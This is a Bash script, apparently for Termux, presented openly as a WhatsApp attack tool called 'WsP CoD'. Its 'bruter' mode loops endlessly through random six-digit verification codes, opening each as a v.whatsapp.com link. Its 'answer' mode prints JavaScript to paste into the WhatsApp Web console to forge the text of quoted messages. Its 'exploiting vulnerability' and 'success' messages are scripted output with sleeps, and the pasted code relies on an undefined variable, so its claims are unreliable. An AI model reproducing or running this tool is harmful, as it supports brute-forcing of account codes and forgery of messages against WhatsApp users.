#!/bin/bash
banner(){
clear
echo -e "\e[32m▄▄▌ ▐ ▄▌.▄▄ ·  ▄▄▄· ▄▄·       ·▄▄▄▄      
██· █▌▐█▐█ ▀. ▐█ ▄█▐█ ▌▪▪     ██▪ ██     
██▪▐█▐▐▌▄▀▀▀█▄ ██▀·██ ▄▄ ▄█▀▄ ▐█· ▐█▌    
▐█▌██▐█▌▐█▄▪▐█▐█▪·•▐███▌▐█▌.▐▌██. ██     
 ▀▀▀▀ ▀▪ ▀▀▀▀ .▀   ·▀▀▀  ▀█▄▀▪▀▀▀▀▀•  \e[0m"
}
banner
while :;
do
echo -n "wsp> "
read opc
c=$(echo "$opc" | awk '{print $1}')
i=$(echo "$opc" | awk '{print $2}')
if [[ $c == "bruter" ]];
then
if [[ -x $PREFIX/bin/termux-open ]];
then
echo -e "\e[32m[WhatsApp]\e[0m brute force"
while :;
do
code="$((1 + RANDOM % 9))$((1 + RANDOM % 9))$((1 + RANDOM % 9))$((1 + RANDOM % 9))$((1 + RANDOM % 9))$((1 + RANDOM % 9))"
echo -e "code \e[32m[$code]\e[0m"
python -m webbrowser -n https://v.whatsapp.com/$code?s=1
done
else
echo -e "WsP CoD:\e[31m termux is required.\e[0m"
fi
elif [[ $c == "answer" ]]
then
sleep 1
echo -e "\e[32m[+]\e[0m exploiting vulnerability"
sleep 1
echo " |"
sleep 1
echo -e " |-\e[32m sucess\e[0m"
sleep 5
echo -e "\e[1;34m[+]\e[0m searching for answer page "
echo -e " |-\e[32m whatsapp.com \e[0m scan.."
sleep 1
echo " |"
sleep 3
echo -e " |-\e[32m web.whatsapp.com \e[0m granted"
sleep 1
echo " |"
sleep 1
echo -en "\e[31m[!]\e[0m message to forge "
read msg
sleep 1
echo " |"
sleep 1
echo -e "\e[32m[+]\e[0m command console attack\e[0m "
sleep 2
echo -e ' |-\e[32m copy and paste to console\e[0m Java Script'
sleep 3
for i in $(seq 1 60); do echo -en "_" ; done ; echo -e ""
echo "
clear();
console.log('%c ▄▄▌ ▐ ▄▌.▄▄ ·  ▄▄▄· ▄▄·       ·▄▄▄▄ \n██· █▌▐█▐█ ▀. ▐█ ▄█▐█ ▌▪▪     ██▪ ██ \n██▪▐█▐▐▌▄▀▀▀█▄ ██▀·██ ▄▄ ▄█▀▄ ▐█· ▐█▌\n▐█▌██▐█▌▐█▄▪▐█▐█▪·•▐███▌▐█▌.▐▌██. ██\n ▀▀▀▀ ▀▪ ▀▀▀▀ .▀   ·▀▀▀  ▀█▄▀▪▀▀▀▀▀• ', 'background: #222; color: #bada55');
console.table('Fake messages to responder on WhatsApp');
alert('WsP CoD: accept to start ...')
e.__x_quotedMsg.body = '$msg';
e.__x_quotedStanzaID = e.__x_quotedStanzaID + '_';
"
for i in $(seq 1 60); do echo -en "_" ; done ; echo -e ""
sleep 1
python -m webbrowser -n https://web.whatsapp.com/
elif [[ $c == "help" ]]
then
echo -e "\e[32m\t WsP CoD help \e[0m"
echo
echo -e "bruter \t bruter force code whatsapp"
echo -e "answer \t false answer message WhatsApp"
echo -e "banner \t show banner "
echo -e "exit \t exit wspcod"
echo
elif [[ $c == "banner" ]]
then
banner
elif [[ $c == "exit" ]]
then
echo -e "\e[31m[exit]\e[0m "
exit
else 
echo -e "WsP CoD:\e[32m help is required\e[0m"
fi
done
